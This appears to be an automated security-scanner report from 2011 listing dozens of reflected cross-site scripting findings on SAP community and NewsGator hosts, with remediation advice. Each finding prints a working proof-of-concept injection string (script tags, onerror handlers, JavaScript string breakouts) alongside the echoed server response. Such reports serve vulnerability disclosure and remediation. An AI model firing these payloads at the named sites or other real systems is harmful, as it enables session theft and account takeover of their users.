Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetic characters plus a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the GetPic?image request parameter is copied into the HTML document as plain text between tags. The payload ff98d<img%20src%3da%20onerror%3dalert(1)>477fb398b41 was submitted in the GetPic?image parameter. This input was echoed as ff98d<img src=a onerror=alert(1)>477fb398b41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the dbedd'-alert(1)-'400de4f3298 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3974'-alert(1)-'0bf57f6bdb7 was submitted in the dbedd'-alert(1)-'400de4f3298 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... k that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/community/ideas?dbedd'-alert(1)-'400de4f3298=1f3974'-alert(1)-'0bf57f6bdb7'); } } function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system propert ...[SNIP]...
1.3. https://cw.sdn.sap.com/cw/community/ideas [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://cw.sdn.sap.com
Path: /cw/community/ideas
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbedd'-alert(1)-'400de4f3298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... ("The link URL is missing, Please check that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/community/ideas?dbedd'-alert(1)-'400de4f3298=1'); } }
function submitIdea(containerID) {
if(containerID == null ){ alert("Cannot create an idea right now"); }else{ window.location.href = '/cw/create-idea!in ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5114f'-alert(1)-'4929ad66ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... ert("The link URL is missing, Please check that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/ideas5114f'-alert(1)-'4929ad66ff5/6794'); } } function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system pr ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e1c1'-alert(1)-'28c731b3c96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20 Content-Type: text/html; charset=UTF-8 x-jal: 19 sap-isc-etag: J2EE/cw JP: D=38142 t=1321226062850345 Content-Length: 16304 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 23:14:22 GMT Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... rt = location.port; var res = protocol + "//" + host; try { if(port.length() > 0); res = res + port; }catch(err){ } window.location.href = url + escape(res + '/ideas/67945e1c1'-alert(1)-'28c731b3c96'); } }
function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system properties are set!."); }else{ window.loc ...[SNIP]...
1.6. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://cw.sdn.sap.com
Path: /cw/ideas/6794
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80da3'-alert(1)-'1e2e99731f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... he link URL is missing, Please check that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/ideas/6794?80da3'-alert(1)-'1e2e99731f5=1'); } } function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system prope ...[SNIP]...
1.7. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://cw.sdn.sap.com
Path: /cw/ideas/6794
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e9d"><script>alert(1)</script>277a2c9c500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the messageID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87246</script><a>5d291e2a5c was submitted in the messageID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3NkU2MzMtQjg5NTExMzA5NzdBNEJCQw== Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 8715 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:45:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: Not Fou ...[SNIP]... s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/message.jspa?messageID=789391587246</script><a>5d291e2a5c"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.9. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums.sdn.sap.com
Path: /message.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c90"><a>b5d8cd961e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3NzVFODAtNTdCMjRGQkQ3MDAxNUZEOA== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 45 SDN_CATEGORY: 3 SDN_THREAD: 1414217 SDN_MESSAGE: 7893915 Content-Length: 36649 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:46:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAML co ...[SNIP]... <link rel="stylesheet" type="text/css" href="/style/style.jsp?messageID=7893915&64c90"><a>b5d8cd961e9=1" /> ...[SNIP]...
1.10. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums.sdn.sap.com
Path: /message.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68510</script><a>c216dce91af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3OEIzOUYtQzUwMzA1OUI0RjgxMTFDQw== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 45 SDN_CATEGORY: 3 SDN_THREAD: 1414217 SDN_MESSAGE: 7893915 Content-Length: 36821 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:47:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAML co ...[SNIP]... .prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/message.jspa?messageID=7893915&68510</script><a>c216dce91af=1"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.11. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums.sdn.sap.com
Path: /thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6382"><a>e34da4ea807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3NTNFREMtNThCRkNDNzNFQjFDRUEwOA== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 53 SDN_CATEGORY: 2 SDN_THREAD: 2072047 SDN_MESSAGE: 10787731 Content-Length: 26941 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:44:04 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAP Por ...[SNIP]... <link rel="stylesheet" type="text/css" href="/style/style.jsp?a6382"><a>e34da4ea807=1&threadID=2072047" /> ...[SNIP]...
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebb22</script>fe58fc0f1fc was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f181</script><a>eb754f6e0b3 was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 9751ab?xss request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938be</script><a>69597fa3541 was submitted in the 9751ab?xss parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 9c165%3C/script%3E%3Ca%3E35be9e751ab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2cb5</script><a>d2dfd37ff4c was submitted in the 9c165%3C/script%3E%3Ca%3E35be9e751ab parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MkQtMTMzOUU3QzhDMzItN0Y1REM5MEI0M0QyRjVGQQ== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 41 SDN_CATEGORY: 2 SDN_THREAD: 480818 SDN_MESSAGE: 3770439 Content-Length: 116203 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:52:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: ESS Lea ...[SNIP]... prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9c165%3C/script%3E%3Ca%3E35be9e751ab=1d2cb5</script><a>d2dfd37ff4c"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.16. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums400.sdn.sap.com
Path: /thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c165</script><a>35be9e751ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NTExQjAtRUE3N0ZDQkYyRjZGNzYxNA== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 41 SDN_CATEGORY: 2 SDN_THREAD: 480818 SDN_MESSAGE: 3770439 Content-Length: 113775 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:43:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: ESS Lea ...[SNIP]...
s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9c165</script><a>35be9e751ab=1"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.17. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://forums400.sdn.sap.com
Path: /thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf17f"><a>fda93e2b7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11de</script><a>56173b93dc0 was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NENCNkQtMjYyODRFQkZGMEU4Qjg0Rg== Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 8807 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:43:34 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: Not Fou ...[SNIP]... " s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818e11de</script><a>56173b93dc0"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8c95<img%20src%3da%20onerror%3dalert(1)>1bc394f6d10 was submitted in the REST URL parameter 1. This input was echoed as c8c95<img src=a onerror=alert(1)>1bc394f6d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52884<img%20src%3da%20onerror%3dalert(1)>a54b19296e9 was submitted in the REST URL parameter 1. This input was echoed as 52884<img src=a onerror=alert(1)>a54b19296e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a86f<script>alert(1)</script>f8176fc3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 30fa2<script>alert(1)</script>600e650462d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d46a3<script>alert(1)</script>ed1bab21ffe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dca84<script>alert(1)</script>708c6d8793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 116cc<script>alert(1)</script>866c815398d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2b53e<script>alert(1)</script>f65685dfe5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 105ae<script>alert(1)</script>8208217648a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63639<script>alert(1)</script>ffb9b6d4be7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19c54<script>alert(1)</script>2e767a4db22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64d8b<script>alert(1)</script>9635c267d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76279<script>alert(1)</script>406dd7aa460 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bfed6<script>alert(1)</script>7971fd19724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bdedf<script>alert(1)</script>e23ec0fffc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76ca2<script>alert(1)</script>458600cdb88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 632b4<script>alert(1)</script>7547db97ab4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22016<script>alert(1)</script>659c332aa84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 91605<script>alert(1)</script>f31917c8368 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sun, 13 Nov 2011 19:38:30 GMT
ETag: 634568099105169583
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 1341
Cache-Control: public, max-age=300
Date: Sun, 13 Nov 2011 19:44:47 GMT
Connection: close
window.ng_scriptload({id:'ngbuzz_153692_data91605<script>alert(1)</script>f31917c8368',status:200,statusText:'200 OK',response:{Data:[{PostId:21198566603,PubDate:new Date(1321177020000),FeedName:'SAP Developer Network SAP Weblogs by Daniel Graversen',Title:'My thoughts on SAP Teched Ma ...[SNIP]...
The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload dfe81<script>alert(1)</script>16777f97ec5 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sun, 13 Nov 2011 19:44:36 GMT
Connection: close
X-N: S
//An error occurred: Could not find Buzz item with id: 153692dfe81<script>alert(1)</script>16777f97ec5
1.39. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nmp.newsgator.com
Path: /NGBuzz/buzz.ashx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fa9d5%3balert(1)//f42b4d2691c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa9d5;alert(1)//f42b4d2691c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 9d28d<img%20src%3da%20onerror%3dalert(1)>40b9e83325f was submitted in the msessionkey parameter. This input was echoed as 9d28d<img src=a onerror=alert(1)>40b9e83325f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
